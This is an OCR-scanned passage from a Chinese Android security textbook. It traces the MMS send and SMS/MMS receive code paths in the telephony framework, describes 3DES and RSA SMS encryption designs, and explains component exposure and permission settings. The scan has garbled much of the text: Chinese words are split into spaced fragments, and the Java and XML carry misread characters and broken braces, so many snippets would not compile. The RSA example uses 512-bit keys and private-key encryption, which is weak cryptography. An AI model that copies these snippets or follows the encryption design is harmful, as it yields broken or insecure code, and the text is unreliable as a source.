I| Move M-Send.req from Outbox into Sent 
Uri uri = persister.move(mSendReqURI, Sent. CONTENT URI); 


mrTransactionState.setState(TransactionState. SUCCESS); 
mTransactionState.setContentUri(uri); 
} catch (Throwable t) { 
Log.e(TAG, Log.getStackTraceString(t)); 
} finally { 
if (mTransactionState.getState() != TransactionState. SUCCESS) ( 
mTransactionState.setState(TransactionState.FAILED); 
mTransactionState.setContentUri(mSendReqURI); 
Log.e(TAG, "Delivery failed."); 
} 
notifyObservers(); 
} 
} 
在 上 述 代 码 中 ， 调 用 了 文件 packages/apps/Mms/src/com/android/mms/transaction/Transaction.java 中 的 函 
数 sendPdu()， 在 此 函数 中 通过 НТТР 协议 来 传输 彩信 数据 ， 有 具体 实现 代码 如 下 所 示 。 
protected byte[ ] sendPdu(long token, byte[ ] pdu, 
String mmscUrl) throws IOException, MmsException { 
if (pdu == null) ( 
throw new MmsException(); 


} 


ensureRouteToHost(mmscUrl, mTransactionSettings); 
return HttpUtils.httpConnection( 


mContext, token, 
@. 


mmscurl, 
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pdu, HttpUtilsHTTP_POST METHOD, 
mTransactionSettings.isProxySet(), 
mTransactionSettings.getProxyAddress(), 
mTransactionSettings.getProxyPort()); 


} 
到 此 为 止 ， 整 个 彩信 的 发 送 过 程 全 部 结束 。 由 此 可 见 ， 彩 信 的 发 送 与 短信 不 同 ， 是 以 网 络 的 方式 发 送 

的 。 下 面 总 结 发 送 彩信 的 基本 流程 。 

(1) 先 取出 所 有 due time 在 当前 时 间 之 前 的 待 发 送 的 彩信 ， 然 后 将 它 的 Uri 和 transactionType 封装 到 
TransactionBundle 中 并 传 给 ServiceHandler， 然 后 将 类 型 设置 为 EVENT_TRANSACTION REQUEST。 

(2) 在 ServiceHandler 中 创建 一 个 SendTransaction 对 象 ， 然 后 调用 processTransaction() 方 法 ， 根 据 当 
前 Transaction 是 否 已 在 队列 中 ， 以 及 当前 的 连接 状态 确定 该 把 这 个 SendTransaction 对 象 放 到 哪个 队列 中 

(mPending 为 待 发 送 ，mProcessing 为 发 送 中 ) 。 

(3) 使 用 sendMessageDelayed() 方 法 发 送 一 个 标记 为 EVENT_CONTINUE_MMS_CONNECTIVITY 的 
message 来 保持 连接 。 

(4) 将 TransactionService 放 入 该 Transaction 对 象 的 观察 者 列表 ， 以 便于 在 后 面 成 功 发 送 后 ， 继 
续 发 送 待 发 送 的 彩信 o 

(5) 使 用 SendTransaction 的 Run() 方 法 从 数据 库 中 获取 指定 彩信 ， 并 构造 SendReq， 经 由 HttpUtils 发 
送 编码 后 的 彩信 。 根 据 发 送 结果 ， 选 择 是 将 错误 状态 存 入 数据 库 ， 还 是 将 该 彩信 转 到 已 发 送 箱 并 通知 
TransactionService 处 理 待 发 送 的 彩信 。 

(6) 执行 TransactionService.update() 方 法 后 ， 先 将 Transaction 从 mProcessing 列表 中 移 除 。 如 果 mPending 
不 为 室 ， 则 说 明 有 彩信 处 于 已 基本 处 理 但 未 发 送 状态 ， 所 以 调用 mServiceHandler0 设 置 EVENT_ 
HANDLE NEXT. PENDING TRANSACTION 进行 处 理 。 

(7) 从 mPending 队列 中 取出 第 一 个 并 交 给 processTransaction 进行 处 理 。 因 为 调用 processTransaction 
的 Transaction 都 会 被 加 入 mProcessing 队列 中 ， 而 发 送 这 个 Transaction 成 功 后 会 再 次 通知 其 观察 者 ， 进 而 
调用 TransactionService 的 update() 方 法 继续 发 送 mPending 队列 中 的 信息 ,所 以 在 mPending 队列 中 的 彩信 会 
自动 按 顺 序 发 完 。 

(8) 对 于 成 功 发 送 的 消息 ， 使 用 Notification 通知 用 户 〈 包 括 消息 未 读 ， 消 息 报告 等 ) ， 并 发 送 
android.intent.action. TRANSACTION COMPLETED ACTION 的 广播 。 


8.1.4 接收 短信 


与 发 送 短信 相 比 ， 接 收 短信 的 过 程 要 简单 一 点 ， 整 个 过 程 涉及 了 如 下 文件 。 
com.android.internal.telephony/Ril.java 
com.android.internal.telephony/SMSDispatcher 
com.android.internal.telephony/CommandsInterface 
com.android.internal.telephony/GsmSMSDispatcher 


com.android.internal.telephony/ImsSMSDispatcher 
hardware/ril/libril/ril.cpp 
com.android.mms.transaction/PrivilegedSmsReceiver 


а 
口 
口 
口 
О com.android.internal.telephony/CdmanSMSDispatcher 
a 
о 
a 
具体 接收 短信 过 程 的 示意 图 如 图 8-3 所 示 。 
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图 8-3 Android 接收 短信 的 流程 图 


(1) Java 应 用 层 的 接收 流程 
在 文件 Riljava 中 定义 了 一 个 完整 的 receive 框架 ， 当 用 户 接收 到 短信 信息 时 , 在 底层 首先 通过 rild 将 接 
收 到 的 短信 通过 socket 传输 机 制 传送 给 文件 Riljava。 因 为 接收 短信 过 程 是 一 个 不 定时 的 操作 ， 所 以 必须 使 
用 监听 器 来 不 间断 地 监视 这 个 socket。 如 果 发 现 有 短信 来 临 ， 则 会 马上 触发 其 相应 的 操作 。rild 是 一 个 守护 
进程 ， 是 整个 Android 系统 ril 层 的 入 口 点 ， 定 义 RILReceiver 内 部 类 主要 的 实现 代码 如 下 所 示 。 
class RILReceiver implements Runnable ( 
byte[ ] buffer; 
RiLReceiver() { 
buffer = new byte[RIL MAX COMMAND BYTES]; 


public void 

гип() ( 
int retryCount = 0; 
String rilSocket = "rild"; 


try {for (;;) { 
LocalSocket s = null; 
LocalSocketAddress |; 


boolean multiRild = SystemProperties.getBoolean("ro.multi.rild", false); 


if (mInstanceld == 0 || multiRild == false) { 
rilSocket = SOCKET NAME RIL; 
) else( 
rilSocket = SOCKET NAME RIL1; 
} 
try{ 
s = new LocalSocket(); 
1= new LocalSocketAddress(rilSocket, 
LocalSocketAddress.Namespace.RESERVED); 
s.connect(l); 
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} 
if (retryCount == 8) ( 

Log.e (LOG TAG, 
"Couldn't find " + rilSocket 
+" socket after " + retryCount 
+ " times, continuing to retry silently"); 

) else if (retryCount > 0 && retryCount < 8) ( 

Log.i (LOG TAG, 
"Couldn't find " + rilSocket 
+" socket; retrying after timeout"); 


H 
try{ 
Thread.sleep(SOCKET OPEN RETRY MILLIS); 
) catch (InterruptedException er) ( 
H 
retryCount++; 
continue; 
} 
retryCount = 0; 
mSocket = s; 
Log.(LOG TAG, "Connected to " + rilSocket + " socket"); 
int length = 0; 
try{ 
InputStream is = mSocket.getInputStream(); 
for (;;) { 
Parcel p; 
length = readRilMessage(is, buffer); 
if (length < 0) { 
11 End-of-stream reached 
break; 
} 
p = Parcel.obtain(); 
p.unmarshall(buffer, 0, length); 
p.setDataPosition(0); 
processResponse(p); 
p.recycle(); 


} 
通过 上 述 代码 可 以 看 出 上 述 线程 会 一 直 和 守护 进程 rild 实现 socket 通信 功能 , 并 获取 了 由 守护 进程 汇报 
的 数据 。 汇 报 工作 是 通过 函数 processResponseO 实 现 的 ， 具 体 实现 代码 如 下 所 示 。 
private void processResponse (Parcel p){ 
int type; 


type = p.readint(); 


if (type == RESPONSE_UNSOLICITED) { 
processUnsolicited (p); 

} else if (type == RESPONSE_SOLICITED) { 
processSolicited (p); 

} 


releaseWakeLocklfDone(); 
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通过 上 述 代 码 中 对 汇报 的 数据 进行 了 分 类 处 理 ， 具 体 说 明 如 下 所 示 。 
O RESPONSE_UNSOLICITED: 表示 接收 到 数据 就 直接 汇报 的 类 型 ， 主 动 汇报 的 类 型 有 网 络 状态 和 
短信 、 来 电 等 。 
口 RESPONSE SOLICITED: 表示 必须 先 请 求 然后 才 响 应 的 类 型 ， 此 处 的 短信 接收 过 程 也 是 如 此 。 
0 processUnsolicited: 表示 该 方法 会 根据 当前 的 请 求 的 类 型 判断 ， 如 果 是 短信 则 是 RIL_UNSOL_ 
RESPONSE_NEW_SMS， 以 下 是 其 具体 的 调用 代码 。 
case RIL UNSOL RESPONSE NEW SMS: ( 
if (RILJ LOGD) unsljLog(response); 


I| FIXME this should move up a layer 
String a[ ] = new String[2]; 


a[1] = (String)ret; 
SmsMessage sms; 


sms = SmsMessage.newFromCMT (a); 
if (mSMSRegistrant != null) ( 
mSMSRegistrant 
.notifyRegistrant(new AsyncResult(null, sms, null)); 
} 
break; 


} 

在 上 述 代码 中 ,创建 mSMSRegistrant 对 象 的 过 程 mSMSRegistrant 是 BaseCommands 的 成 员 变量 ， 并 且 
通过 调用 方法 setOnNewSMS() 来 赋值 ， BaseCommands 是 Ril.java 文件 中 的 子 类 。 虽 然 方法 setOnNewSMS() 
设置 handler 的 源头 是 在 GsmSMSDispatcher 类 中 实现 的 ,但 是 最 后 会 调用 类 SmsDispatcher 的 handMessage() 
方法 ， 这 是 因为 GsmSMSDispatcher 是 SmsDispatcher 的 子 类 ， 而 且 因 为 类 GsmSMSDispatcher 没有 复写 
handMessage() 的 方法 , 所 以 在 接收 到 消息 后 肯定 由 父 类 的 handMessage() 方 法 来 处 理 。 上 述 处 理 流程 如 图 8-4 
所 示 。 


一 一 二 EpoeceProny IccSmainterfaceManacer| [Imssmspispatcher] | GemsMsDispatcher 
ese! 
0 [J Н Н T 
: d | : : 


1: makeDefaultphonet 
— si 


22 1ccSmsinteri 


图 8-4 ”处 理 接收 信息 的 过 程 


(2) Framework 层 的 处 理 过 程 
在 Android 系统 的 Framework 层 中 ， 类 SMSDispatche 给 CommandInterface 对 象 设置 了 handler 的 处 理 
方法 ,设置 当 接 收 到 短信 后 触发 函数 mSMSRegistrant.notifyRegistrant(new AsyncResult(null, sms, null)), 然后 
回调 调用 之 前 传 入 的 handler， 接 下 来 在 handler 中 处 理 短信 消息 ， 具 体 实 现代 码 如 下 所 示 。 
public void handleMessage(Message msg) í 
AsyncResult ar; 
switch (msg.what){ 


@ 


case EVENT NEW SMS: 
1 Anew SMS has been received by the device 
if (Config.LOGD) ( 
Log.d(TAG, "New SMS Message Received"); 
} 
SmsMessage sms; 
ar = (AsyncResult) msg.obj; 
if (ar.exception != null) { 


Log.e(TAG, "Exception processing incoming SMS. Exception: 


+ ar.exception); 
return; 
} 
sms = (SmsMessage) ar.result; 
try{ 
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int result = dispatchMessage(sms.mWrappedSmsMessage); 


if (result != Activity.RESULT_OK) { 


И RESULT OK means that message was broadcast for app(s) to 


ll handle 
11 Any other result, we should ack here 


boolean handled = (result == Intents. RESULT SMS HANDLED); 
notifyAndAcknowledgeLastlncomingSms (handled, result, null); 


} 

) catch (RuntimeException ex) ( 
Log.e(TAG, "Exception dispatching message", ex); 
notifyAndAcknowledgeLastlncomingSms(false, 


Intents. RESULT SMS GENERIC ERROR, null); 


} 
break; 
} 
} 


在 上 述 代 码 中 ，int result = dispatchMessage(sms.mWrappedSmsMessage); 调 用 了 子 类 (GsmSMSDispatcher ) 
的 函数 dispatchMessage0 进 行 处 理 ， 经 过 判断 处 理 将 普通 短信 交 给 方法 dispatchPdus(pdus) 来 处 理 ， 具 体 实现 


代码 如 下 所 示 。 
protected void dispatchPdus(byte[ ][ ] pdus) ( 
Intent intent = new Intent(Intents.SMS RECEIVED ACTION); 
intent.putExtra("pdus", pdus); 
dispatch(intent, "android.permission.RECEIVE SMS"); 


H 
void dispatch(Intent intent, String permission) ( 


// Hold а wake lock for WAKE ОСК TIMEOUT seconds, enough to give any 


ll receivers time to take their own wake locks 
mWakeLock.acquireWAKE LOCK TIMEOUT); 


mContext.sendOrderedBroadcast(intent, permission, mResultReceiver, 


this, Activity. RESULT OK, null, null); 
} 


通过 上 述 代码 使 用 顺序 广播 法 将 短信 播放 出 去 (action #2 SMS RECEIVED ACTION) ,无 论 广播 是 否 被 


中 断 ， 在 最 后 都 会 调用 mResultReceiver() 将 已 读 或 未 读 的 状态 告 多 
- 播 后 会 调用 函数 onReceiveWithPrivilege(). 


则 当 短 信 应 用 程序 中 的 PrivilegedSmsReceiver 广播 接收 器 接收 到 广 


对 方 。 如 果 在 短信 广播 中 间 没 有 被 终止， 


因为 类 PrivilegedSmsReceiver 继承 于 类 SmsReceiver， 所 以 会 调 


父 类 的 方法 onReceiveWithPrivilege(). H 
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体 实现 代码 如 下 所 示 。 
protected void onReceiveWithPrivilege(Context context, Intent intent, boolean privileged) { 
// !f 'privileged' is false, it means that the intent was delivered to the base 
// no-permissions receiver class. If we getan SMS RECEIVED message that way, it 
// means someone has tried to spoof the message by delivering it outside the normal 
11 permission-checked route, so we just ignore it 
if (Iprivileged && (intent.getAction().equals(Intents.S$MS RECEIVED ACTION) 
|| intent.getAction().equals(Intents.SMS CB RECEIVED ACTION))) { 
return; 


} 


intent.setClass(context, SmsReceiverService.class); 
intent.putExtra("result", getResultCode()); 
beginStartingService(context, intent); 


} 

接 下 来 只 需 将 该 Service 交 给 类 SmsReceiverService 去 处 理 即 可 ， 到 此 整个 接收 短信 的 过 程 介绍 完毕 。 
彩信 的 接收 过 程 和 上 述 普 通 短 信 的 接收 过 程 类 似 ， 两 者 的 区 别 在 于 函数 dispatchMessage() 会 根据 
smsHeader.portAddrs 来 判断 当前 是 彩信 还 是 短信 ， 然 后 调用 对 应 的 方法 进行 处 理 ， 具 体 过 程 如 图 8-5 所 示 。 
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图 8-5 接收 彩信 的 具体 流程 


由 此 可 见 ，Android 系统 的 彩信 接收 应 用 层 部 分 从 PushReceiver 开始 ， 有 具体 流程 如 下 所 示 。 

(1) 当 调 用 onReceive() 后 设置 让 屏幕 亮 5 秒 ， 然 后 创建 一 个 ReceivePushTask， 并 使 用 它 的 execute() 
方法 。ReceivePushTask 是 一 个 AsyncTask， 实 现 了 doInBackground0 方 法 。 当 传 入 intent 后 ， 会 在 
doInBackground() 中 将 其 中 的 数据 转 成 GenericPdu， 并 根据 其 消息 类 型 做 出 不 同 的 操作 。 

(2) 如 果 是 发 送 报告 或 已 读 报告 ， 将 其 存 入 数据 库 。 

(3) 如 果 是 彩信 通知 并 且 已 存在 ， 则 不 进行 处 理 。 否 则 将 其 存 入 数据 库 ， 并 启动 TransactionService Ж 
行 处 理 。 在 TransactionService 中 调用 mServiceHandler()， 过 程 大 致 与 发 送 彩 信 时 相同 ， 只 是 此 处 创建 的 是 
NotificationTransaction 。 

(4) 如 果 不 支持 自动 下 载 或 数据 传输 没 打 开 ， 仅 通知 mmsc。 和 否则 下 载 相应 的 彩信 ， 然 后 删除 彩信 通 
知 ， 通 知 mmsc 会 删除 超过 容量 限制 的 彩信 ， 然 后 通知 TransactionService 处 理 其 余 待 发 送 的 彩信 。 


@ 
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8.2 短信 加 密 机 制 的 设计 模式 


Б 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 8 章 \ 短 信 加 密 机 制 的 设计 模式 .avi 

在 现实 开发 应 用 中 ， 可 以 对 短信 进行 加 密 ， 这 样 可 以 提高 短信 信息 的 安全 。 在 Android 系统 中 实现 短信 
加 密 时 ， 通 常 需 要 经 过 短信 编码 、 短 信息 加 密 、 短 信息 解密 和 短信 息 解码 这 4 个 步骤 。 具 体 设 计 模 式 如 下 

(1) 在 接收 短信 时 ， 设 计 一 个 smsService 类 继承 其 基 类 Service， 于 系统 后 台 运 行 服务 ， 并 且 判 断 是 
否 收 到 短信 。 

(2) 一 旦 收 到 短信 便 进 行 解析 与 重组 短信 的 工作 ， 在 重组 之 后 通过 sendBroadcast 发 送 系统 广播 ， 并 
在 构建 Intent 时 传 入 自 定义 的 ACTION 名 称 。 

(3) 设计 一 个 继承 自 基 类 Broadcast Receiver 的 类 ， 功 能 是 接受 自 定义 系统 广播 ACTION 信息 。 一 旦 
smsService 服务 传 来 系统 广播 信息 ， 就 会 被 所 设计 的 类 接收 ， 然 后 通过 接收 传 来 的 参数 并 唤醒 接收 的 主 程序 。 


8.2.1 短信 编码 设计 模式 


在 Android 系统 中 ， 发 送 英文 或 数字 很 容易 ， 但 是 当 发 送 中 文 时 会 出 现 乱码 问题 。 所 以 当 Android 发 送 
带 有 中 文 的 短信 息 时 应 该 进行 必要 的 编 解码 处 理 。 例 如 ， 在 处 理 中 文 时 可 以 采用 将 中 文 编码 转换 为 unicode 
编码 的 处 理 ， 这 样 就 可 以 正确 地 传送 中 文 信息 了 。 这 种 编码 方案 具体 处 理 流程 如 下 所 示 。 

CD 首先 获取 短信 息 内 容 的 字符 长 度 ， 同 时 从 短信 的 第 一 个 字符 处 开始 获取 字符 。 因 为 英文 和 数字 
ASCII 码 小 于 128， 所 以 可 以 依据 这 个 条 件 来 判断 取得 字符 是 否 为 中 文字 符 。 

(2) 如 果 为 中 文字 符 ， 将 字符 进行 转 unicode 码 的 处 理 。 

(3) 编码 处 理 后 的 字符 就 形成 了 可 以 正确 发 送 的 信息 。 

举 一 个 简单 例子 ， 假 设 发 送 的 短信 息 是 “aaa 晚上 好 ”， 按 照 上 述 处 理 模式 编码 后 ， 可 以 得 到 
aaa\u665a\u4e0a\u597d 的 结果 ， 这 样 把 每 个 unicode 字符 前 面 带 有 u 分 隔 符 进行 加 密 处 理 后 并 发 送出 去 。 
在 接收 到 信息 解密 后 ， 得 到 的 也 是 aaa\u665a\u4e0a\u597d， 然 后 判断 aaavu66Savu4e0avu597d 中 是 否 有 分 隔 符 
u， 如 果 有 则 转换 成 中 文字 符 ， 最 终 输出 短信 息 是 “aaa 晚上 好 ”。 


8.22 DES 短信 息 加 密 /解密 算法 


在 加 密 / 解 密 处 理 模块 中 ， 采 用 了 3DES 加 密 算法 来 加 密 短 信息 的 内 容 。3DES 是 以 DES 算法 为 基本 加 
密 模块 ， 使 用 了 3 条 64 位 的 密 钥 对 信息 进行 3 次 加 密 处 理 ， 这 样 比 起 DES 更 加 安全 。 假 设 3 次 加 密 的 密 
钥 分 别 为 K1、K2、K3， 则 在 DES 加 密 解 密 的 流程 中 ， 密 钥 K1、K2、K3 决定 了 3DES 算法 的 安全 性 。 在 
加 密 过 程 中 ， 取 输入 的 密码 形成 密 钥 K1、K3， 每 个 密 钥 所 需 的 字 节 数组 长 度 为 8 位 , 不 足 8 位 时 后 面 补 0， 
超出 8 位 取 前 8 位 的 值 ， 这 样 密 钥 的 变动 性 提高 了 加 密 的 可 靠 性 。 
因为 DES 算法 是 以 信息 数据 的 64 位 为 单位 进行 加 密 ， 当 信息 数据 不 足 64 位 时 ， 就 需要 对 数据 进行 填 
充 。 此 处 采用 PKCS7Padding 方式 进行 数据 填充 ， 每 个 填充 的 字 节 代表 所 填 的 总 字 节 数 ， 例 如 ， 发 送 的 消息 
为 hello， 当 被 写成 16 进 制 模式 时 变 为 68、65、6C、6C、6F。 因 为 这 只 有 5 个 字 节 ， 所 以 还 得 填充 3 个 字 
节 ， 因 此 填充 后 变 为 68、65、6C、6C、6F、03、03、03， 此 时 就 可 以 进行 DES 加 密 操作 了 。 

当然 , 除了 DES 加 密 解 密 算法 外 , 在 Android 系统 中 还 可 以 使 用 RSA 算法 对 短信 进行 加 密 处 理 。 例如， 
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下 面 是 一 个 通用 的 RSA 加 密 Android 短信 算法 代码 。 
package com; 


import java.security.Key; 

import java.security.KeyFactory; 

import java.security.KeyPair; 

import java.security.KeyPairGenerator; 

import java.security.NoSuchAlgorithmException; 
import java.security.PrivateKey; 

import java.security.PublicKey; 

import java.security.interfaces RSAPrivateKey; 
import java.security.interfaces RSAPublicKey; 
import java.security.spec.InvalidKeySpecException; 
import java.security.spec.PKCS8EncodedKeySpec; 
import java.security.spec.X509EncodedKeySpec; 


import java.util.HashMap; 
import java.util.Map; 


import javax.crypto.Cipher; 


public class RSACoder ( 

WAGE 

public static String Key_ALGORITHM="RSA"; 

// 私 钥 

public static String Private Key="RSAPrivateKey"; 

ДАВ 

public static String Public Key="RSAPublicKey"; 

// 密 钥 长 度 

public static int Key_Size=512; 

public static Map<String,Object> initKey() throws Exception{ 

/实例 化 密 钥 生成 器 

KeyPairGenerator keypairgenerator-KeyPairGenerator.getlnstance(Key ALGORITHM); 

/初始 化 

keypairgenerator.initialize(Key_Size); 

/获得 密 钥 对 

KeyPair keypair=keypairgenerator.generateKeyPair(); 

[E] 

RSAPrivateKey pritekey=(RSAPrivateKey)keypair.getPrivate(); 

IHR 

RSAPublicKey pubkey=(RSAPublicKey)keypair.getPublic(); 

Map<String,Object> keymap=new HashMap<String, Object>(2); 

keymap.put(Private_Key, pritekey); 

keymap.put(Public_Key, pubkey); 

return keymap; 

} 

/获得 密 角 

public static byte[ ] getPrivateKey(Map<String,Object>keymap)( 
Key pritekey=(Key)keymap.get(Private Key); 
return pritekey.getEncoded(); 
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/获得 公 角 

public static byte[ ] getPublicKey(Map<String,Object>keymap)( 
Key pubkey=(Key)keymap.get(Public Key); 
return pubkey.getEncoded(); 


} 

// 私 钥 加 密 

public static byte[ ] encryptByPrivateKey(byte[ ] key,byte[ ] data) throws Exception{ 
/实例 化 密 钥 材料 

PKCS8EncodedKeySpec pcs8spec=new PKCS8EncodedKeySpec(key); 
/实例 化 密 钥 工厂 

KeyFactory keyfactory=KeyFactory.getlnstance(Key_ALGORITHM); 

// 生 成 私 钥 

PrivateKey pritekey=keyfactory.generatePrivate(pcs8spec); 

// 私 钥 加 密 

Cipher cipher=Cipher.getlnstance(pritekey.getAIgorithm()); 
cipher.init(Cipher.ENCRYPT_MODE, pritekey); 

return cipher.doFinal(data); 


} 

/ 公 钥 解密 

public static byte[ ] decryptByPublicKey(byte[ ] key,byte[ ] data) throws Exception( 
/实例 化 公 钥 材 料 

X509EncodedKeySpec x509spec=new X509EncodedKeySpec(key); 
/实例 化 密 钥 工厂 

KeyFactory keyfactory-KeyFactory.getlnstance(Key ALGORITHM); 
/获得 公 角 

PublicKey pubkey-keyfactory.generatePublic(x509spec); 

// 对 数据 进行 解密 

Cipher cipher=Cipher.getlnstance(Key_ALGORITHM); 
cipher.init(Cipher.DECRYPT MODE, pubkey); 

return cipher.doFinal(data); 

) 

) 
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在 开发 Android 应 用 程序 的 过 程 中 ， 最 为 常用 的 组 件 有 Activity、Intent、Service、Content Provider 和 
Broadcast Receiver。 本 章 将 详细 讲解 上 述 常用 Android 应 用 组 件 安全 机 制 的 基本 知识 ， 为 读者 学 习 本 书后 面 
的 知识 打下 基础 。 


9.1 设置 组 件 的 可 访问 性 


RL 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 9 章 \ 设 置 组 件 的 可 访问 性 .avi 

在 开发 Android 应 用 程序 的 过 程 中 ， 可 以 设置 程序 中 某 个 组 件 的 可 访问 性 ， 具 体 方法 是 在 文件 
AndroidManifest.xml 中 设置 属性 exported 的 值 。 如 果 设 置 为 true， 则 表示 此 组 件 公 有 ， 可 以 被 外 部 程序 所 使 
用 或 交互 ; 如 果 设 置 为 false， 则 表示 只 有 同一 个 应 用 程序 的 组 件 或 带 有 相同 用 户 ID 的 应 用 程序 才能 启动 或 
绑 定 该 服务 。 

在 Android 系统 中 ， 属 性 exported 的 默认 值 依赖 于 该 服务 所 包含 的 过 滤器 。 如 果 没 有 过 滤器 ， 则 表示 该 
服务 只 能 通过 指定 明确 类 名 的 方式 来 调用 ， 也 就 是 说 该 服务 只 能 在 应 用 程序 的 内 部 使 用 (因为 其 他 外 部 使 
用 者 不 会 知道 该 服务 的 类 名 ) 。 在 这 种 情况 下 ， 属 性 exported 的 默认 值 是 false。 但 是 在 另 一 方面 ， 如 果 至 
少 包 含 了 一 个 过 滤器 , 则 意味 着 该 服务 可 以 给 外 部 的 其 他 应 用 提供 服务 , 因此 属性 exported 的 默认 值 是 true。 
属性 exported 不 是 将 限制 服务 暴露 给 其 他 应 用 程序 的 唯一 方法 ， 还 可 以 使 用 权限 来 限制 能 够 与 该 服务 交互 
的 外 部 实体 。 
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E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 9 章 \Intent 组 件 的 安全 机 制 .avi 
在 Android 系统 中 ， 应 用 程序 的 3 个 核心 组 件 〈 活 动 、 服 务 和 广播 接收 器 ) 都 是 通过 Intent 来 激活 的 。 
在 本 节 的 内 容 中 ， 将 详细 讲解 Android 系统 中 Intent 组 件 安全 机 制 的 基本 知识 。 


9.2.1 Intent 和 IntentFilter 简介 


Intent (Ж) 本 身 是 一 个 包含 被 执行 操作 抽象 描述 的 被 动 的 数据 结构 ， 对 于 广播 而 言 ， 是 某 件 已 经 发 
生 并 被 声明 的 事件 的 描述 。 在 Android 系统 中 ， 存 在 如 下 儿 种 不 同 的 机 制 来 传送 Intent 到 每 种 组 件 中 。 
(1) 一 个 Intent 对 象 传递 给 Context.startActivity0 或 Activity.startActivityForResult() 以 启动 一 个 活动 ， 
或 者 让 一 个 存在 的 活动 去 做 某 些 新 的 事情 。 
(2) 一 个 Intent 对 象 是 传递 给 Context.startService0 来 发 起 一 个 服务 或 者 递交 新 的 指令 给 运行 中 的 服务 。 
个 Intent 能 被 传递 给 Context.bindService(), 在 调用 组 件 和 一 个 目标 服务 之 间 建 立 连接 。 作 为 一 个 可 选项 ,Intent 
可 以 发 起 这 个 服务 。 
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(3) 传递 给 任意 广播 方法 (例如 Context.sendBroadcast()、Context.sendOrderedBroadcast() 或 者 Context. 
sendStickyBroadcast()) Й Intent 对 象 被 传递 给 所 有 感 兴趣 的 广播 接收 者 。 
为 了 更 好 地 通知 系统 Intent 可 以 处 理 哪些 意图 、 活 动 、 服 务 和 广播 接收 器 ，Android 可 以 有 一 个 或 多 个 
Intent 过 滤器 。 


9.2.2 Intent 组 件 的 通信 安全 机 制 


在 Android 系统 中 ， 应 用 程序 中 的 Activity, Service, Broadcast Receiver 等 组 件 之 间 需 要 通过 Intent 组 
件 进 行 通信 ， 组 件 之 间 的 通信 需要 在 文件 Androidmanifestxml 中 暴露 组 件 ， 但 是 很 多 风险 就 是 由 于 不 恰当 
的 组 件 暴 露 引起 的 。 

在 Android 系统 中 ，Intent 启动 不 同 组 件 的 方法 如 下 所 示 。 

O Activity 组 件 ，startActivity0) 方 法 和 startActivityForResult() 方 法 。 

口 Service 组 件 ，startService() 方 法 和 bindService() 方 法 。 

口 Broadcasts 组 件 ， sendBroadcast0) 方 法 、sendOrderedBroadcast() 方 法 和 sendStickyBroadcast() 方 法 。 

在 Android 系统 中 有 两 种 使 用 Intent 的 用 法 : 一 种 是 显 式 的 Intent， 即 在 构造 Intent 对 象 时 就 指定 接收 
者 ; 另 一 种 是 隐 式 的 Intent, BB Intent 的 发 送 者 在 构造 Intent 对 象 时 无 需 知道 也 无 需 关 心 接收 者 是 谁 ， 这 有 
利于 降低 发 送 者 和 接收 者 之 间 的 耦合 。 

下 面 是 显示 调用 示例 代码 。 

Intent intent = new Intent(); 

intent.setClassName( "com.samples.intent.simple" , 

"com.samples.intent.simple.TestActivity" ); 

startActivity(intent); 

Intentintent= new Intent(A.activity,B.class); 

startActivity(intent); 

下 面 是 隐 式 调用 示例 代码 。 

Intent intent = new Intent(Intent. ACTION DIAL ); 

startActivity(intent); 

Intentintent= new Intent("com.test.broadcast"); 

intent.putString("PASSWORD","123456"); 

sendBroadcast(intent); 

Intent intent = new Intent("com.test.service"); 

intent.putString("USERNAME","test"); 

startService(intent); 

无 论 是 显示 调用 还 是 隐 式 调用 ， 都 能 使 用 Intent 在 不 同 应 用 之 间 传 递 数据 。 但 是 在 使 用 Intent 传递 数据 
时 ， 可 能 会 产生 如 下 风险 。 


恶意 发 送 广播 、 启 动 应 用 服务 。 

调用 组 件 ， 接 收 组 件 返回 的 数据 。 

拦截 有 序 广播 。 

要 想 避 免 上 述 风 险 ， 可 用 的 解决 方案 如 下 。 

(1) 最 小 化 组 件 暴露 

为 不 参与 跨 应 用 调用 的 组 件 添加 android:exported="false" 属 性 ， 功 能 是 设置 这 个 属性 是 私有 的 ， 只 有 同 
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-个 应 用 程序 的 组 件 或 带 有 相同 用 户 ID 的 应 用 程序 才能 启动 或 绑 定 该 服务 ， 例 如 下 面 的 代码 : 
<activity 
android:name=".LoginActivity" 
android:label-"(gstring/app name" 
android:screenOrientation-"portrait" 
android:exported="false"> 
(2) 设置 组 件 访问 权限 
在 Android 系统 中 可 以 设置 调用 组 件 或 公开 的 广播 、 服 务 的 权限 ， 设 置 权限 的 方式 有 如 下 3 种 。 
O 组 件 添加 android:， permission 属 性 ， 例 如 : 
«activity android:name=".Another" android:label="@string/app_name" 
android:permission="com.test.custempermission"> 
</activity> 
口 声明 < permission> 属 性 ， 例 如 : 
<permission android:description="test" 
android:label="test" 
android:name="com.test.custempermission" 
android:protectionLevel="normal"> 
</permission> 
在 上 述 代码 中 ，protectionLevel 有 4 种 级 别 ， 分 别 是 normal. dangerous. signature 和 signatureOrSystem. 
当 被 设置 为 signature、signatureOrSystem 时 表示 只 有 具有 相同 签名 时 才能 被 调用 。 
Q 调用 组 件 者 声明 <uses-permission>， 例 如 : 
<uses-permission android:name="com.test.custempermission" /> 
(3) 暴露 组 件 的 代码 检查 
在 Android 系统 中 提供 了 各 种 在 运行 时 检查 、 执 行 、 授 予 和 撤销 权限 的 API ， 这 些 API 是 类 
android.content.Context 中 的 组 成 部 分 ， 并 且 此 类 还 提供 了 有 关 应 用 程序 环境 的 全 局 信息 。 例 如 : 
if (context.checkCallingOrSelfPermission("com.test.custempermission") 
!= PackageManager.PERMISSION. GRANTED) { 
11 The Application requires permission to access the 
11 Internet"); 


) else ( 
ll access the Internet 


) 
9.2.3 ”过 滤器 的 安全 机 制 


在 现实 中 不 能 过 分 信赖 一 个 Intent 过 滤器 的 安全 性 , 当 它 打 开 一 个 组 件 来 接收 某 些 特定 类 型 的 隐 式 意图 
时 ， 并 不 能 阻止 以 这 个 组 件 为 目标 的 显 式 Intent。 即 使 过 滤器 对 组 件 要 处 理 的 Intent 能 够 限制 某 些 动作 和 数 
据 源 ， 但 是 总 有 人 能 把 一 个 显 式 Intent 和 一 个 不 同 的 动作 及 数据 源 组 合 在 一 起 ， 然 后 命名 该 组 件 为 目标 。 

-个 过 滤器 和 Intent 对 象 有 同样 的 动作 、 数 据 以 及 类 别 字段 ， 一 个 隐 式 Intent 在 过 滤器 的 所 有 3 个 方面 
